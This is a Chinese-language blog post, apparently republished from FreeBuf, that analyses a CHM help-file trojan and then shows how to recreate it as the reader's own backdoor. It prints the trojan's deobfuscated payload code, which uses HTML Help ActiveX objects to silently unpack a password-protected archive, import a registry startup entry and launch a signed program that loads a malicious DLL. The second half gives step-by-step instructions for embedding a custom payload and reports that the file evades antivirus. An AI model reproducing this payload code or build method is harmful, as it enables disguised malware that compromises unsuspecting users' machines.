前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CHM木马的分析与利用

CHM木马的分析与利用

作者头像
FB客服
发布2019-08-06 11:40:29
2.5K0
发布2019-08-06 11:40:29
举报
文章被收录于专栏:FreeBufFreeBuf

前言

CHM文件格式是微软推出的基于HTML文件特性的帮助文件系统,也称作“已编译的HTML帮助文件”。CHM能够支持脚本、Flash、图片、音频、视频等内容,并且同样支持超链接目录、索引以及全文检索功能,常用来制作说明文档、电子书等以方便查阅,在绝大多数人的印象中,CHM类型文件是“无公害”文档文件。

偶然获得了一个过X60启动的CHM木马,由于从未接触过此类木马,遂进行一番学习,并通过木马所带来的启发再创造。

一、木马行为分析

CHM文件是经过压缩的各类资源的集合,使用7z解压软件直接打开木马样本,如图所示,可以发现CHM文件内部包含一个说明.html文件。

打开说明.HTM文件可以发现里面存着混淆过的JS脚本代码:

进行一番解密并写下粗略的注释 PS:本人并未学过JS 所以并不懂JS 以下有任何错误请大家指出

可以看出最关键的代码应该是

代码语言:javascript
复制
var d = '<OBJECT id=UNRAR classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=",C:\\Program Files\\WinRAR\\unrar.exe,e -r -y -pa123.../*- ' + c + ' C:\\Users\\Public\\Documents"><PARAM name="Item2" value="273,1,1"></OBJECT><OBJECT id=RUN classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=",regedit.exe,/s C:\\Users\\Public\\Documents\\1.reg"><PARAM name="Item2" value="273,1,1"></OBJECT><OBJECT id=AUTO classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=",C:\\Users\\Public\\Documents\\Perflog.exe"><PARAM name="Item2" value="273,1,1"></OBJECT>';

结合我之前对CHM木马的行为分析基本可以判断CHM木马的执行流程:

1.利用WINRAR解压自身到C:\Users\Public\Documents 2.执行CMD命令注册1.reg 添加启动 3.打开Perflog.exe

在WIN7虚拟机打开样本可以看到解压出了如下文件:

可以看到解压出了如图五个文件并成功添加启动项

由于我不懂逆向工程 但是可以做出如下推测

1.perflog.exe是具有有效签名的白文件启动时会调用edudll.dll 2.edudll.dll是黑dll

以上这应该是个一个典型的白加黑木马

水平有限就不去分析这个perflog.exe的行为了

接下来思考如何打造属于自己的CHM后门

二、再创造

思路:

样本的JS代码基本不变,只需去掉那些无用的文件,解压缩释放出1.reg与payload即可

1.反编译样本CHM(这里使用EasyCHM)

2.修改说明.htm (由于懒 就不用做太多改动了)

3.将自己的1.reg与payload制作成压缩包

4.编译CHM

5.将压缩包并写入CHM(利用C32Asm)

将payload.rar粘贴到CHM的最后面并保存

6.测试

OK,成功。

三、小结

之所以这个方法能绕过杀毒检测我感觉可能是因为利用CHM文件可以绕过父进程检测

PS:我WIN7 32位虚拟机测试是可以过检测的,不知道别的环境是否可以,如果不行别喷我呀

另外此方法不用网络下载也很出彩(但是遇到没有预装winrar的系统可能就傻了)

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-08-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 一、木马行为分析
  • 二、再创造
  • 三、小结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档